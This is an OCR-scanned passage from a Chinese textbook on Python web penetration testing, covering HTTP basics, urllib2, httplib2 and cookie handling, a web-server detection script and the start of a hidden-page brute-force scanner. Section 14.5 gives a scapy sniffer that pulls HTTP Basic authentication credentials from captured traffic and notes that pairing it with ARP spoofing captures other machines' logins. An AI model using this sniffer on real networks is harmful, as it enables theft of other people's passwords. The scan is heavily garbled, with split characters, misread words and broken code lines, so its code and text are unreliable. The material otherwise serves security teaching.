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这 里 的 通信 使 用 到 了 HTTP Request 与 HITP Response。 其 中 ，HTTP Request 由 请 求 方 
法 URI 协 议 /版 本 、 请 求 头 (Request Header)、 请 求 正 文 (Request Body) 三 部 分 组 成 。 

请 求 方法 URI 协 议 /版 本 位 于 HTTP Request 的 首 行 ， 包 含 HTTP Request Method, URI, 
Protocol Version 三 部 分 ， 例 如 “GET /testhtml HITP/1.1”， 其 中 HTTP Request Method 表示 
为 GET 方法 ，URI 为 /test.html, HTTP 版 本 号 为 1.1。 

请 求 头 部 分 为 Request 的 头 部 信息 ， 包 含 编码 信息 、 请 求 客户 端 类 型 等 信息 。 

请 求 正文 部 分 包含 Request 的 主体 信息 ， 与 HTTP Request Header 之 间隔 开 一 行 。 

HTTP Response 的 数据 格式 与 HTTP Request 类 似 ， 也 包含 三 部 分 信息 。 由 状态 行 、 响 应 
头 (Response Header)、 响 应 正文 (Response Body) 组 成 。 

状态 行 由 协议 版 本 、 数 字形 式 的 状态 代码 以 及 相应 的 状态 描述 ， 各 元 素 之 间 以 空格 分 
隔 。 其 中 的 状态 代码 由 三 位 数字 组 成 ， 表 示 请 求 是 否 被 理解 或 被 满足 。 常 见 的 状态 代码 有 如 
下 几 种 。 

(1 ) 200 Successful request: 请 求 已 成 功 ， 请 求 所 希望 的 响应 头 或 数据 体 将 随 此 响应 返回 。 

(2) 201 Resource was newly c : 请 求 已 经 被 实现 ,而且 有 一 个 新 的 资源 已 经 依据 请 求 的 
需要 而 建立 ， 且 其 URI 已 经 随 Location : 头 信息 返回 。 假 如 需要 的 资源 无 法 及 时 建立 ， 应 当 
返回 “202 Accepted’ 。 

(3 ) 301 Resource moved perm : 永久 移动 。 请 求 的 资源 已 被 永久 地 移动 到 新 URI， 返 
回信 息 会 包括 新 的 URI， 浏 览 器 会 自动 定向 到 新 URI. 今后 任何 新 的 请 求 都 应 使 用 新 的 URI 
代替 。 

(4) 307 Resource moved temp: 临时 重 定向 。 

(5) 400 Invalid request: 客户 端 请 求 的 语法 错误 ， 服 务 器 无 法 理解 。 

(6) 401 thorization required: 请 求 要 求 用 户 的 身份 认证 。 

(7) 403 cess denied: 服务 器 理解 请 求 客户 端的 请 求 ， 但 是 拒绝 执行 此 请 求 。 

(8) 404 Resource could not be : 服务 器 无 法 根据 客户 端的 请 求 找到 资源 (网 页 )。 通 过 此 
代码 ， 网 站 设计 人 员 可 设置 “您 所 请 求 的 资源 无 法 找到 ”的 个 性 页 面 。 

(9 ) 405 Method not allowed: 客户 端 请 求 中 的 方法 被 禁止 。 

(10 ) 500 Internal server error: 服务 器 内 部 错误 ， 无 法 完成 请 求 。 


14.2 ”对 Web 程序 进行 渗透 测试 所 需 模 块 


在 Python 中 提供 了 大 量 用 来 处 理 HTTP 的 模块 ， 例 如 urllib urllib2, urllib3, 、httplib、 
httplib2 request 和 BeautifulSoup 模块 。 这 些 模 块 的 功能 之 间 有 重合 ， 所 以 经 常会 看 到 有 些 
相同 功能 的 程序 却 使 用 了 不 同 的 模块 文件 。 这 里 面 首 先 讲解 在 本 章 会 用 到 的 模块 文件 。 
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14.2.1 urllib2 库 的 使 用 


urllib2 是 Python 2 中 自 带 的 一 个 很 有 用 的 库 ， 可 以 利用 这 个 库 轻 松 完成 对 网 页 的 访问 。 
需要 注意 的 是 ， 这 个 库 在 Python 3 中 被 分 成 urllib request 和 urllib.error 两 个 类 。 在 urllib2 中 
提供 了 很 多 实用 的 函数 。 

urllib2.urlopen() : 这 是 urllib2 中 最 为 常用 的 一 个 函数 ， 只 需要 向 这 个 函数 提供 一 个 网 址 
或 者 Request 对 象 ， 它 就 可 以 创建 一 个 表示 远程 URL 的 response 对 象 ， 然 后 像 对 本 地 文件 一 
样 对 其 进行 操作 

使 用 之 前 需要 导入 这 

>>> import urllib2 

然后 使 用 urllib2.urlopen 函数 打开 一 个 链接 地 址 ， 并 将 返回 的 内 容 保存 到 response 中 

>>> response=urllib2.urlopen ("http://www.nmap.org") 

可 以 对 urlopen() 返回 的 类 文件 对 象 进行 如 下 操作 

) read() : 这 个 方法 的 使 用 方式 和 文件 对 象 完 全 一 样 ， 可 以 用 来 读 取 网 页 的 全 部 

HTML “pam 


>>> response.read() 


执行 的 结果 将 会 返回 该 页 面 的 全 部 HTML 代码 ， 如 图 14-5 所 示 


图 14-5 返回 该 页 面 的 全 部 HTML 代码 


) info(): 返回 一 个 httplib.HTTPMessage 对 象 ， 获 取 meta-information 信息 ， 例 如 服务 
o. 的 headers 信息 

>>> print response.info() 

执行 的 结果 将 会 返回 该 页 面 的 headers 信息 ， 如 图 14-6 所 示 。 

(3 ) getcode() : 返回 HTTP 状态 码 。 如 果 是 
HTTP 请 求 ， 例 如 ，200 表示 请 求 成 功 完 成 ， 而 
404 表示 网 址 未 找到 ， 如 图 14-7 所 示 。 

(4) geturl(): n DA 通常 可 以 
识别 网 址 是 否 设置 跳 转 。 这 个 urllib2 会 帮 用 户 完 
成 ， 最 后 得 到 的 是 真实 地 址 ， 如 图 14-8 所 示 。 图 14-6 返回 该 页 面 的 headers 信息 


Pe print response infor) 
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nse.getcode() 


图 14-7 使 用 getcode0 获得 状态 码 图 14-8 获取 真实 打开 的 地 址 


urllib2.urlopen 函数 除了 使 用 url 作为 参数 之 外 ， 也 可 以 使 用 request 对 象 。 操 作 的 步骤 
如 下 所 示 。 
url='http://www.sijitao.net/' 


request=urllib2.Request (url) 
response=urllib2.urlopen (request) 


返回 结果 的 操作 方法 与 上 面 的 response 是 一 样 的 。 

urllib2 中 第 二 个 经 常 使 用 的 函数 就 是 urllib2.Request()， 这 个 函数 的 完整 格式 为 urllib2. 
Request(urll, Pia headers][, originreqhost][, unverifiable])， 比 较 常 用 的 前 两 个 参数 如 下 。 

(1) url: 是 一 个 字符 串 ， 其 中 包含 一 个 有 效 的 URL 

(2) data : 是 个 字符 让， 指定 额外 的 数据 发 送 到 服务 器 ， 如 果 没有 data 需要 发 送 可 以 
J “None”, 


14.2.2 ”其 他 模块 文件 


除了 urllib2 之 外 ， 在 Web 应 用 的 渗透 过 程 中 还 会 使 用 很 多 种 模块 。Python 2 与 Python 3 
的 模块 各 有 区 别 ， 其 中 ，Python 2 常用 的 有 urllib 、httplib2 、requests。 下 面 给 出 了 这 些 常 见 
模块 的 简单 介绍 

(1) aurllib 模块 :这 个 模块 的 功能 较为 基础 ， 提 供 一 些 比较 原始 基础 的 方法 而 urllib2 没 
有 这 些 ， 例 如 urlencode。 下 面 给 出 了 urllib 官方 的 常见 用 法 

使 用 带 参数 的 GET 方法 取 回 URL: 


>>> import urllib 

>>> params = urllib.urlencode(('spam': 1, 'eggs': 2, 'bacon': 0}) 

>>> f = urllib.urlopen ("http://www.musi-cal.com/cgi-bin/query?%s" % params) >>> 
print f.read() 


使 用 POST 方法 : 


>>> import urllib 

>>> params = urllib.urlencode (('spam': 1, 'eggs': 2, "bacon': 0}) 

>>> f = urllib.urlopen ("http://www.musi-cal.com/cgi-bin/query", params) 
>>> print f.read() 


(2) httplib2 模块 : 这 个 模块 和 urllib2 有 相似 的 地 方 。httplib2 中 提供 对 缓存 的 支持 ， 例 
如 下 面 的 例子 中 就 使 用 “.cache” 目 录 保 存 了 对 页 面 的 访问 缓存 。 


Import httplib2 
H = httplib2.Http(".cache") 
resp, content=h.request ("http://example.org/", "GET") 
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(3 ) requests 模块 : 使 用 Requests 发 送 网 络 请 求 非常 简单 。 
# 开始 要 导入 requests 模块 : 


>>> import requests 

# 尝试 获取 某 个 网 页 : 

>>> r = requests.get('https://github.com/timeline.json') 

现在 获得 了 一 个 Response 对 象 r。 可 以 从 这 个 对 象 中 获取 所 有 想 要 的 信息 。requests fj 
便 的 API 意 味 着 所 有 HTTP 请 求 类 型 都 是 显而易见 的 。 利 用 这 个 库 发 送 HTTP 请 求 十 分 简 
单 ， 下 面 给 出 使 用 requests 模块 发 送 POST. PUT, DELETE, HEAD 以 及 OPTIONS 的 方式 。 


>>> r = requests.post ("http://httpbin.org/post") 
>>> r = requests.put ("http://httpbin.org/put") 

>>> r = requests.delete("http://httpbin.org/delete") 
>>> r = requests.head ("http://httpbin.org/get") 

>>> r = requests.options ("http://httpbin.org/get") 


关于 requests 的 详细 使 用 ， 可 以 访问 http://docs.python-requests.org/zh_CN/latest/user/ 
quickstart.html。 

(4) BeautifulSoup 模块 : BeautifulSoup 提供 一 些 简单 的 、Python 式 的 函数 ， 用 来 处 理 
导航 、 搜 索 、 修 改 分 析 树 等 功能 。 它 是 一 个 工具 箱 ， 通 过 解析 文档 为 用 户 提供 需要 抓 取 的 数 
据 ， 因 为 简单 ， 所 以 不 需要 多 少 代码 就 可 以 写 出 一 个 完整 的 应 用 程序 。 关 于 BeautifulSoup 模 
块 的 详细 使 用 ， 可 以 访问 https://www.crummy.com/software/BeautifulSoup/bs4/doc.zh/。 

(5 ) cookielib 模块 : Python 中 的 cookielib 库 (Python 3 中 为 http.cookiejar) 为 存储 和 管 
FE Cookie 提供 客户 端 支持 。 该 模块 主要 功能 是 提供 可 存储 Cookie 的 对 象 。 使 用 此 模块 捕获 
Cookie 并 在 后 续 连 接 请 求 时 重新 发 送 ， 还 可 以 用 来 处 理 包含 Cookie 数据 的 文件 。 这 个 模块 
主要 提供 了 这 几 个 对 象 : CookieJar、FileCookieJar、MozillaCookieJar、LWPCookieJar。 关 于 
Cookielib 模块 的 详细 使 用 ， 可 以 访问 https://docs.python.org/2/library/cookielib.html。 


14.3 ”处理 HTTP 头 部 


14.3.1 解析 一 个 HTTP 头 部 


首先 以 一 个 比较 简单 的 程序 开始 ， 这 个 程序 利用 httplib2 模块 中 的 request 方法 向 目标 服 
务 器 发 送 了 一 个 GET 类 型 的 请 求 ， 并 将 收 到 的 应 答 显 示 在 屏幕 上 。 


import httplib2 
client=httplib2.Http() 
header, content = client.request ("http://www.baidu.com", "GET") 
for field, value in header.items(): 
print feld + w"; "+ wayue 
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gre Http) 函数 构造 了 一 个 httpllib2 对 象 ， 实 际 完成 工作 的 是 这 个 对 象 的 request 
函数 ， 这 个 函数 以 URL 地 址 和 HTTP 方法 作为 参数 ， 返 回 两 个 值 ， 一 个 是 字典 类 型 的 HTTP 
pe 另 一 个 是 请 求 地 址 的 HTML 页 面 。 例 如 , 上 例 中 变量 header 中 保存 的 就 是 HTTP 
头 部 文件 ， 而 content 保存 的 就 是 HTML 页 面 的 代码 。 这 段 代码 执行 的 结果 如 图 14-9 所 示 。 


© Console x 


<terminated> /root/Documents/Aptana Studio 3 Workspace/test1/test1 py 
status: 200 

content-length: 112293 

bdqid: 0xd336ae230002e113 

x-powered-by: HPHP 

transfer-encoding: chunked 

set-cookie: BAIDUID-051338312A63D2EDFD9C0E4D0352F8E9:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; 
expires: Thu, 14 Dec 2017 09:14:13 GMT 

vary: Accept-Encoding 

bduserid: 0 

content-location: http://www.baidu.com 
Connection: Keep-Alive 

-content-encoding: gzip 

cxy all: baidu+0c7c116bf7581bcf88c9c347850e263d 
cache-control: private 

date: Thu, 14 Dec 2017 09:14:54 GMT 

p3p: CP=" OTI DSP COR IVA OUR IND COM " 

server: BWS/1.1 

content-type: text/html; charset=utf-8 
bdpagetype: 1 

x-ua-compatible: IE=Edge, chrome=1 


图 14-9 使 用 httpllib2 获得 的 HTTP 头 部 文件 


个 过 程 也 可 以 使 用 urllib2 来 实现 ， 使 用 urllib2 模块 编写 相同 功能 的 代码 要 简单 一 些 ， 
nbs: httplib2 的 主要 区 别 是 urllib2 的 urlopen 方法 不 再 返回 两 个 值 ， 而 是 只 有 一 个 re- 
sponse。 这 个 response 中 既 包 含 头 部 文件 ， 也 包括 请 求 页 面 的 代码 。 可 以 使 用 两 个 函数 进行 读 
取 ， 其 中 ，read() 用 来 读 取 网 页 的 全 部 HTML 代码 ，info() 用 来 读 取 头 部 文件 。 


import urllib2 

url = "http://www.baidu.com/" 
response = urllib2.urlopen (url) 
print response.info() 


这 段 代 码 的 执行 结果 如 图 14-10 所 示 。 


Console x 


<terminated> /root/Documents/Aptana Studio 3 Workspace/test1/test1.py 

Date: Thu, 14 Dec 2017 10:01:27 GMT 

Content-Type: text/html; charset=utf-8 

Transfer-Encoding: chunked 

Connection: Close 

Vary: Accept-Encoding 

BAIDUID-93AB1164AE3CB594B3C301E7B30D0445:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; 
IIDUPSID=93AB1164AE3CB594B3C301E7B30D0445; expires=Thu, 31-Dec-37 23:55:55 GMT; ma; 
STM=1513245687; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; 


| PS | PSSID-25354_1430 21084 25178 22074; path=/; domain=.baidu. com 
P3P: CP=" OTI DSP COR IVA OUR IND COM " 
Cache-Control: private 

Cxy_all: baidu+adbded86644ed4a187acd322eada362c 
Expires: Thu, 14 Dec 2017 10:00:58 GMT 
X-Powered-By: HPHP 

Server: BWS/1.1 

X-UA-Compatible: IE=Edge, chrome=1 

BDPAGETYPE: 1 

BDQID: 0xaa9ad6e40000bddb 

BDUSERID: 9 


图 14-10 使 用 urllib2 获得 的 HTTP 头 部 文件 
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从 图 14-10 中 可 以 清楚 地 看 到 目标 服务 器 返回 的 response 头 部 ， 两 个 库 得 到 的 结果 有 一 
些 不 同 。 


14.3.2 ”构造 一 个 HTTP Request 头 部 


利用 ullib2 还 可 以 十 分 简单 地 构造 HTTP Request 数 据 包 ， 当 在 浏览 器 地 址 栏 中 输入 
URL 地 址 并 按 下 回 车 键 之 后 ， 浏 览 器 就 会 向 目标 服务 器 发 送 一 个 HTTP Request 数据 包 。 这 
个 数据 包 的 内 容 是 浏览 器 所 决定 的 ， 现 在 使 用 Python 自行 设计 一 个 HITP Request 数据 包 的 

import urllib2 

url= "http://www.baidu.com" 

# 构造 Request 数据 包 的 头 部 

send headers = { 

'Host':'www.baidu.com', 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) 
Gecko/20100101 Firefox/16.0', 'Accept':'text/html,application/xhtml+xml,application/ 
xml;q=0.9,*/*;q=0.8', 'Connection':'keep-alive' 

) 
req = urllib2.Request (url,headers=send_headers) 
response= urllib2.urlopen (req) 


response_header = response.info() 
print response_header 


14.4 ”处 理 Cookie 


如 果 你 经 常 在 购物 网 站 搜索 某 一 个 商品 ， 那 么 当 你 访问 其 他 包含 广告 的 网 站 时 ,很 有 可 
能 展现 出 来 的 广告 就 是 你 搜索 的 内 容 。 这 种 情况 即使 是 关机 了 也 会 出 现 ， 信 息 是 如 何 被 这 些 
网 站 获悉 的 ? 

中 央 电 视 台 的 “315” 晚 会 上 曾经 曝光 过 这 个 问题 ， 这 一 切 都 源 于 目标 网 站 在 主机 上 所 
保存 的 一 个 不 起 眼 的 文件 一 一 Cookie。 国 内 多 家 网 络 广告 公司 在 用 户 不 知情 的 情况 下 ， 通 过 
Cookie 采集 用 户 信息 ， 泄 漏 用 户 个 人 隐私 。 

Cookie 是 某 些 网 站 为 了 能 够 辨别 用 户 的 身份 而 储存 在 用 户 本 地 计算 机 上 的 数据 (一 般 经 
过 加 密 )。 简 单 地 说 ， 就 是 当 用 户 访问 网 站 时 ， 该 网 站 会 通过 浏览 器 网 站 建立 自己 的 Cookie, 
它 负责 存储 用 户 在 该 网 站 上 的 一 些 输入 数据 与 操作 记录 ， 当 用 户 再 次 浏览 该 网 站 时 ， 网 站 就 
可 以 通过 浏览 器 查 探 该 Cookie， 并 以 此 识别 用 户 身 份 ， 从 而 输出 特定 的 网 页 内 容 。 

这 里 先 使 用 cookielib 来 获取 访问 www.baidu.com 所 产生 的 Cookie。 


>>> import cookielib 
>>> import urllib2 
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+ 声明 一 个 CookieJar 对 象 实例 来 保存 cookie 

>>> Cookie=cookielib.CookieJar () 

+ 利用 urllib2 库 的 HTTPCookieProcessor 对 象 来 创建 cookie 处 理 器 
>>> handler=urllib2.HTTPCookieProcessor (cookie) 

# 通过 handler 来 构建 opener 

>>> opener=urllib2.build opener (handler) 

>>> opener.open ("http://www.baidu.com") 


现在 已 经 获取 访问 百度 的 Cookie， 在 屏幕 上 输出 这 个 Cookie。 


>>> print cookie 

<CookieJar[<Cookie BAIDUID=F54F7FF5EC5F97CA22E1128EE87CCB15:FG=1 for .baidu. 
com/>, <Cookie BIDUPSID=F54F7FF5EC5F97CA22E1128EE87CCB15 for .baidu.com/>, <Cookie 
H_PS_ PSSID=1426 19036 21095 25177 _20719 for .baidu.com/>, <Cookie PSTM=1513661766 
for .baidu.com/>, <Cookie BDSVRTM=0 for www.baidu.com/>, <Cookie BD HOME=0 for www. 
baidu.com/>]> 


另外 ， 也 可 以 将 获取 的 Cookie 保存 到 本 地 中 ， 需 要 注意 的 是 ， 保 存 文件 的 FileCookie- 
Jar 类 中 有 两 个 子 类 : MozillaCookieJar 和 LWPCookieJar。 这 两 个 子 类 提供 了 不 同 的 保存 方 
式 ， 例 如 ， 首 先 以 MozillaCookieJar 来 保存 Cookie。 


import urllib2 

import cookielib 

filename="MyBaiduCookie.txt" 
FileCookieJar=cookielib.MozillaCookieJar (filename) 

FileCookieJar. save () 

opener =urllib2.build_opener (urllib2.HTTPCookieProcessor (FileCookieJar)) 
opener .open ("http://www.baidu.com") 

FileCookieJar. save () 

print open (filename) .read() 


保存 的 形式 如 图 14-11 所 示 。 


=== RESTART: C:/Users/admin/Desktop/python/cookie.py ============== 
HTTP Cookie File 

# http: //cur1. haxx, se/rfc/cookie_spec. htnl 

# This is a generated file! Do not edit. 


„baidu. com IRE / FALSE 3661151692 BAIDUID 7DB204BD1786A112D197016DBB1F9AD8:FG=1 
„baidu, com IRE / FALSE 3661151692 BIDUPSID TDB204BD1786A112D197016DBB1F9ADS 
„baidu. com TRE / FALSE 3661151692 PSIH 1513668046 


»>1 


图 14-11 使 用 MozillaCookieJar 保存 的 Cookie 


将 上 面 程序 中 的 人 替换 为 “FileCookieJar= 
cookielib. LWPCookieJar (filename)”， 然 后 执行 这 个 程序 ， 得 到 的 结果 如 图 14-12 所 示 。 


= RESTART: C:/Users/adnin/Desktop/python/cookie. py ======s+======= 

#LWP-Cookies-2. 0 

Set-Cookie3: BAIDUID=" A276B0455CBE00C32298A4BBEA546B05:FG=1"; path="/"; domain="“.baidu.com ; path_spec; domain_dot; expires="2086-01-06 

10:43:397"” ; version=0 

Set-Cookie: BI TEE EE Ss path="/"; donain=".baidu. coa"; path_spec; domain_dot; expires="2086-01-06 10:43 
97"; ve 

Set-Cookie3: C PSTN=1513668573 path=*/“; domain=“.baidu.com” : path_spec: domain_dot; expires=“2086-01-06 10:43:39Z“; version=0 


>> 


图 14-12 使 用 LWPCookieJar 保存 的 Cookie 
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将 这 个 Cookie 保存 到 文件 之 后 ， 也 可 以 读 取 这 些 文件 。 但 是 , 需要 注意 的 是 Cookie 的 
格式 ， 例 如 ， 使 用 MozillaCookieJar 保存 的 Cookie 文件 ， 读 取 的 时 候 也 需要 使 用 Mozilla- 
CookieJar。 下 面 给 出 了 一 个 用 来 读 取 上 一 个 程序 所 保存 Cookie 的 程序 。 

import urllib2 

import cookielib 

filename="MyBaiduCookie.txt" 

MozillaCookieJarFile =cookielib.MozillaCookieJar () 


MozillaCookieJarFile.load (filename) 
print MozillaCookieJarFile 


14.5 捕获 HTTP 基本 认证 数据 包 


除了 浏览 器 之 外 ， 很 多 应 用 程序 也 可 以 使 用 HTTP 与 Web 服务 器 进行 交互 。 这 时 通常 会 
采用 一 种 叫 作 HTTP 基本 认证 的 方式 。 这 种 方式 就 是 使 用 Base64 算法 来 加 密 “ 用 户 名 二 + 冒 
号 + 密码 "， 并 将 加 密 后 的 信息 放 在 HTTP Request 中 的 header Authorization 中 发 送 给 服务 端 。 
例如 ， 用 户 名 是 atmin， 密 码 是 123456， 两 者 使 用 冒号 连接 在 一 起 的 结果 是 admin:123456, 
再 用 Base64 对 这 个 字符 串 进行 编码 ， 得 到 的 结果 为 YWRtaW46MTIzZNDU2。 将 这 个 结果 发 
送 给 服务 器 。Base64 是 一 种 任意 二 进 制 到 文本 字符 串 的 编码 方法 ， 常 用 于 在 URL Cookie, 
网 页 中 传输 少量 二 进 制 数据 。 

每 天 都 有 大 量 的 这 种 数据 在 网 络 中 传输 ， 前 面 已 经 编写 过 一 段 可 以 在 网 络 中 进行 监听 的 
程序 ， 现 在 为 这 个 程序 再 添加 一 个 功能 ， 就 是 将 HTTP 基本 认证 的 数据 包 过 滤 出 来 。 这 个 程 
序 需要 使 用 到 两 个 新 的 模块 ， 分 别 是 re 和 base64。 

首先 介绍 一 下 re 模块 ， 它 的 作用 是 实现 对 正则 表达 式 的 支持 。 利 用 这 个 模块 就 可 以 快速 
在 捕获 数据 包 的 内 容 中 查找 指定 的 字 节 。 本 例 中 查找 的 就 是 “Authorization: Basic”. re 中 主 
要 有 两 个 函数 : re.match 与 re.search。re.match 只 匹配 字符 串 的 开始 ， 如 果 字 符 串 开始 不 符合 
正则 表达 式 ， 则 匹配 失败 ， 函 数 返 回 None; 而 re.search 匹配 整个 字符 串 ， 直 到 找到 一 个 匹 
配 。 这 里 面 选择 使 用 re.search。 下 面 给 出 了 一 个 实例 。 


import re 
text = "Authorization: Basic YWRtaW46MTIzNDU2" 
m = re.search(r'Authorization: Basic (.+)', text) 
if m: 
print m.group(0), m.group (1) 
else: 
print 'not search' 


执行 的 结果 如 下 所 示 。 


Authorization: Basic YWRtaW46MTIZNDU2 YWRtaW46MTIZNDU2 
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base64 中 有 两 个 函数 : b64encode 用 来 实现 编码 ， 而 b64decode 用 来 实现 解码 。 


import base64 

text = "admin:123456" 

auth_strl = base64.b64encode (text) 
print auth_strl 
auth_str2=base64.b64decode (auth_str1) 
print auth_str2 


执行 的 结果 如 下 所 示 。 


YWRtaW46MTIZNDU2 
admin:123456 
>>> 


接 下 来 完成 一 个 完整 的 程序 。 这 个 程序 中 使 用 sniff 函数 捕获 网 络 中 的 数据 包 ， 并 设置 
了 过 滤器 只 捕获 端口 为 80 的 数据 包 。 
import re 
from base64 import b64decode 
from scapy.all import sniff 
dev = "wlan0" 
def handle_packet (packet) : 
tcp = packet.getlayer ("TCP") 
match = re.search(r"Authorization: Basic (.+)",str(tcp.payload)) 
if match: 
auth_str = b64decode (match.group(1)) 
auth = auth_str.split(":") 
print "User: " + auth[0] + " Pass: " + auth[1 
sniff(iface=dev,store=0,filter="tcp and port 80",prn=handle packet) 


但 是 如 果 要 捕获 其 他 计算 机 上 的 登录 数据 包 ， 需 要 和 ARP 欺骗 程序 结合 使 用 ， 否 则 只 
能 捕获 本 机 上 的 登录 数据 包 。 


14.6 ”编写 Web 服务 器 扫描 程序 


本 节 编 写 一 个 程序 ， 用 于 检测 一 台 主机 上 面 是 否 运 行 着 HTTP 服务 。 前 面 介 绍 过 如 何 检 
测 一 台 主 机 上 面 的 80 端口 是 否 开放 ， 但 是 这 种 检测 不 一 定 能 可 靠 地 检测 出 目标 主机 是 否 真 
的 提供 Web 服务 。 因 为 目标 主机 完全 可 能 开放 80 端口 ， 但 并 未 提供 Web 服务 。 但 是 ， 如 
果 对 目标 服务 器 发 起 一 个 HTTP 请 求 ， 并 得 到 回应 ， 就 可 以 肯定 这 人 台 服 务 器 提供 了 Web 服 
务 。 这 个 程序 也 可 以 使 用 GET A HEAD 方法 来 完成 。 首 先 以 GET 方法 来 完成 这 个 功能 ， 
代码 如 下 。 


import urllib2 
import sys 
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if len(sys.argv) != 2: 
print "Usage: testURL <IP>Nn eg: testURL http: //192.168.1.1" 
sys.exit(1) 


URL = argv[1] + 要 检测 页 面 的 地 址 
response = urllib2.urlopen (URL) # HH urllib2 向 服务 器 发 送 get 请 求 
print response.info() + 获取 服务 器 返回 的 页 面 信息 


然后 判断 返回 值 是 否 有 效 即 可 。 这 里 在 192.168.1.1 上 建立 了 一 个 Web 服务 器 (在 测试 
时 也 可 以 使 用 任何 一 个 可 以 打开 页 面 的 地 址 ， 例 如 http:Wwww.baidu.com)， 然 后 使 用 这 段 代 
码 来 测试 这 个 服务 器 ， 执 行 的 结果 如 下 所 示 。 

Content-Type: text/html;charset=UTF-8 

Content-Length: 820 


Connection: close 
Cache-control: no-cache 


这 表示 “http:/192.168.1.1” 这 个 地 址 上 运行 着 Web 服务 ， 那么 接 下 来 测试 一 个 没有 运 
行 Web 服务 的 他 地址 ， 例 如 服务 器 “http://192.168.1.102”( 在 测试 时 也 可 以 使 用 任何 一 个 没 
有 提供 Web 服务 的 主机 )， 这 时 执行 的 结果 会 出 现 如 下 一 个 错误 。 
URLError: <urlopen error [Errno 10061] > 
也 就 是 说 ， 如 果 目 标 服务 器 上 没有 提供 Web 服务 ， 这 段 程序 执行 之 后 ， 就 会 抛 出 一 
个 错误 ， 那 么 可 以 使 用 except 来 捕获 这 个 错误 ， 将 这 段 程序 进行 修改 ， 如 果 正 常 ， 得 到 
response， 表 明 目 标 服务 器 上 运行 着 Web 服务 ， 如 果 捕 获 了 错误 ， 表 明 目 标 服务 器 上 没有 
运行 Web 服务 。 


import urllib2 

import sys 

if len(sys.argv) != 2: 
print "Usage: testURL <IP>Nn eg: testURL http: //192.168.1.1" 
sys.exit(1) 


URL = argv[1] # 要 检测 页 面 的 地 址 
print "[*] Testing %s" % URL 
try: 
response = urllib2.urlopen (URL) # WH urllib2 向 服务 器 发 送 get 请 求 
except: 
print("[-] No web server at %s") % URL 
response = None 
if response != None: 


print "[*] Response from %s" $% URL 
print response.info() 


再 次 执行 这 个 程序 ， 将 参数 设置 为 “http://192.168.1.1”， 得 到 的 结果 如 下 。 


[*] Testing http://192.168.1.1 
[*] Response from http://192.168.1.1 
Content-Type: text/html;charset=UTF-8 
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Content-Length: 820 
Connection: close 
Cache-control: no-cache 


而 将 参数 设置 为 “http://192.168.1.102”， 得 到 的 结果 如 下 。 


[*] Testing http://192.168.1.102 
[-] No web server at http://192.168.1.102 


不 过 使 用 HEAD 方法 会 更 快捷 ， 因 为 HEAD 方法 无 须 目标 服务 器 返回 整个 页 面 的 代码 。 
现在 利用 HITP 方 法 中 的 HEAD 方法 来 完成 对 目标 的 检测 ， 相 比 起 GET 方法 来 说 ， 使 用 
HEAD 方法 会 更 快速 。HEAD 方法 的 特点 如 下 。 

(1) 只 请 求 资 源 的 首部 ; 

(2) 检查 超 链接 的 有 效 性 ; 

(3) 检查 网 页 是 否 被 修改 ; 

(4) 多 用 于 自动 搜索 机 器 人 获取 网 页 的 标志 信息 ， 获 取 RSS 种 子 信息 ， 或 者 传递 安全 认 
证 信息 等 。 

使 用 HEAD 方法 来 完成 这 个 功能 ， 基 本 与 GET 方法 相同 ， 只 是 需要 在 使 用 Request 时 
指定 所 使 用 的 方法 为 “HEAD”， 修 改 完 的 代码 如 下 。 


import urllib2 

import sys 

if len(sys.argv) != 2: 
print "Usage: testURL <IP>Nn eg: testURL http: //192.168.1.1" 
sys.exit(1) 


URL = argv[1] + 要 检测 页 面 的 地 址 
print "[*] Testing %s" $% URL 
try: 


request = urllib2.Request (URL) 

request.get_method = lambda : 'HEAD' 

response = urllib2.urlopen (request) # 调用 urllib2 向 服务 器 发 送 get 请 求 
except: 

print("[-] No web server at %s") % URL 

response = None 
if response != None: 

print "[*] Response from %s" $% URL 


print response.info() 


14.7 暴力 扫描 出 目标 服务 器 上 所 有 页 面 
一 个 网 站 往往 拥有 很 多 个 页 面 ， 这 些 页 面 中 最 为 常见 的 就 要 数 index 页 面 ， 这 就 是 常 说 
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的 主页 。 当 在 浏览 器 地 址 栏 中 输入 “ http://192.168.1.1” 实 际 上 打开 的 就 是 这 台 服 务 器 上 的 
index 页 面 。 网 站 的 其 他 页 面 则 提供 了 其 他 的 功能 ,例如 ， 用 来 展示 内 容 的 页 面 ， 用 来 进 
行 登录 的 页 面 等。 不 过 有 些 页 面 并 不 应 该 展示 给 用 户 ， 这 些 页 面 可 能 包含 网 站 的 敏感 信息 ， 
但 是 很 多 程序 员 往 往 会 没有 隐藏 这 个 页 面 ， 在 大 多 数 时 候 ， 这 并 不 会 带 来 什么 麻烦 ， 因 为 
很 少 有 用 户 能 找到 这 些 页 面 。 但 是 黑客 往往 会 利用 一 些 工 具 找到 这 些 页 面 ， 从 而 获得 有 用 
的 信息 。 

这 些 工 具 的 原理 也 很 简单 ， 因 为 常见 的 页 面 起 的 名 字 大 部 分 都 是 相同 的 ， 例 如 index, 
admin. login 等 ， 网 上 很 容易 找到 收集 了 常见 页 面 的 字典 文件 。 然 后 使 用 目标 服务 器 的 地 址 
和 这 个 字典 文件 的 表 项 组 合 ， 使 用 get 方法 进行 测试 ， 如 果 得 到 回应 ， 说 明 目 标 服务 器 上 存 
在 这 个 页 面 ， 否 则 表示 目标 服务 器 上 没有 这 个 页 面 。 

下 面 编写 一 个 用 来 测试 http://192.168.169.133 上 是 否 存 在 一 个 名 为 “ link.htm” 页 面 的 
程序 。 

import urllib2 

host="http://192.168.169.133" 

item="link.htm" 

target = host + "/" + item 

request = urllib2.Request (target) 

request.get_method = lambda : 'GET' 


response = urllib2.urlopen (request) 
print response.info() 


执行 这 个 程序 之 后 ， 得 到 的 结果 如 下 所 示 。 


Server: NetBox Version 2.8 Build 4128 

Date: Thu，21 Dec 2017 03:12:34 GMT 

Connection: Close 

Content-Type: text/html 

Last-Modified: Sun, 20 Sep 2007 09:54:20 GMT 

Content-Length: 12211 

这 表示 现在 http://192.168.169.133 上 存在 一 个 名 为 “ link.htm” 页 面 ， 同 样 如 果 目 标 上 
没有 这 个 页 面 ， 将 会 得 到 一 个 错误 。 

HTTPError: HTTP Error 404: File Not Found 

可 以 使 用 try 和 except 来 判断 这 个 页 面 是 否 存在 ， 如 果 except 捕获 到 错误 ， 则 可 以 认为 
